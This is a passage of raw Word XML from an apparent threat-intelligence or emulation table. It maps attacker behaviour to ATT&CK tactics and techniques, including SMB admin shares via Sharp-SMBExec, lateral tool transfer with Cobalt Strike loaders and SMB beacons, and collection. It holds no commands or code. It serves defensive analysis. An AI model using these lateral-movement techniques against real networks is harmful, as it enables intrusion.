                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4F468F17" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="60EC506D" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="64D65517" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1053" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0D8B37FD" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="30EF9637" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="002D1D50" w14:paraId="2B85AF44" w14:textId="77777777" w:rsidTr="00E545CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48574AC6" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57DC77A7" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE726D2" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21C9285F" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1E956F" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="5957A3C1" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1053" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12321A8D" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27315B3B" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D70BED" w:rsidRPr="002D1D50" w14:paraId="0EB6A544" w14:textId="77777777" w:rsidTr="00E545CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42A18C75" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A964CA7" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03078EF2" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54037915" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24490A0D" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="21136306" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1053" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FCAAFE6" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DCAF8C7" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="002D1D50" w:rsidRDefault="00D70BED" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006412BA" w:rsidRPr="00B857D7" w14:paraId="0E478D46" w14:textId="77777777" w:rsidTr="00E545CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B51D80C" w14:textId="7ACDD76A" w:rsidR="006412BA" w:rsidRDefault="006412BA" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDA0060" w14:textId="1684329C" w:rsidR="006412BA" w:rsidRPr="00B857D7" w:rsidRDefault="006412BA" w:rsidP="00FD53AB">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0008 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F4D4FAC" w14:textId="615E541D" w:rsidR="006412BA" w:rsidRPr="00B857D7" w:rsidRDefault="006412BA" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006412BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1021.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006412BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F6496F" w14:textId="68964FC1" w:rsidR="006412BA" w:rsidRDefault="006412BA" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A6BF9E5" w14:textId="77777777" w:rsidR="006412BA" w:rsidRPr="00B857D7" w:rsidRDefault="006412BA" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7B5EA679" w14:textId="697E9696" w:rsidR="006412BA" w:rsidRDefault="006412BA" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1053" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79255974" w14:textId="4CF9169D" w:rsidR="006412BA" w:rsidRDefault="006412BA" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-LMV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E5ADC1" w14:textId="39C45BD8" w:rsidR="006412BA" w:rsidRPr="008D6D8A" w:rsidRDefault="006412BA" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] Via </w:t>
            </w:r>
            <w:r>
              <w:t>Sharp-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMBExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00447BFF" w:rsidRPr="00B857D7" w14:paraId="2EDDFF6C" w14:textId="77777777" w:rsidTr="00E545CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3824A799" w14:textId="4C098A64" w:rsidR="00447BFF" w:rsidRDefault="007D3A57" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="713E60A9" w14:textId="78B7ABD1" w:rsidR="00447BFF" w:rsidRPr="00B857D7" w:rsidRDefault="007D3A57" w:rsidP="00FD53AB">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0008 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="010F2990" w14:textId="04B26F91" w:rsidR="00447BFF" w:rsidRPr="00B857D7" w:rsidRDefault="007D3A57" w:rsidP="00FD53AB">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1570 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007D3A57">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Lateral Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DBA17A9" w14:textId="39475FD2" w:rsidR="00447BFF" w:rsidRDefault="007D3A57" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="272A7787" w14:textId="77777777" w:rsidR="00447BFF" w:rsidRPr="00B857D7" w:rsidRDefault="00447BFF" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="23383FC6" w14:textId="0233CE8A" w:rsidR="00447BFF" w:rsidRDefault="007D3A57" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1053" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FF35E94" w14:textId="2B9A88DE" w:rsidR="00447BFF" w:rsidRDefault="007D3A57" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-LMV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F9764B4" w14:textId="77777777" w:rsidR="007D3A57" w:rsidRPr="007D3A57" w:rsidRDefault="007D3A57" w:rsidP="007D3A57">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="007D3A57">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">They also usually deploy additional Cobalt Strike loaders (DLL- or PowerShell-based) that would </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DFF36D1" w14:textId="77777777" w:rsidR="007D3A57" w:rsidRPr="007D3A57" w:rsidRDefault="007D3A57" w:rsidP="007D3A57">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D3A57">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">load SMB beacons. These can be used to control machines in the same network that are not directly </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="768030D3" w14:textId="73335FB5" w:rsidR="00447BFF" w:rsidRPr="008D6D8A" w:rsidRDefault="007D3A57" w:rsidP="007D3A57">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D3A57">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>connected to the interne</w:t>
            </w:r>
            <w:r w:rsidR="00CC1D94">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1D94" w:rsidRPr="005B3D45" w14:paraId="5842C3E3" w14:textId="77777777" w:rsidTr="00E545CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F437FC0" w14:textId="7108081E" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B88F191" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00F2491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0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FA83B97" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="008135C1" w:rsidRDefault="00CC1D94" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6445E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F6445E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1213 :</w:t>
            </w:r>
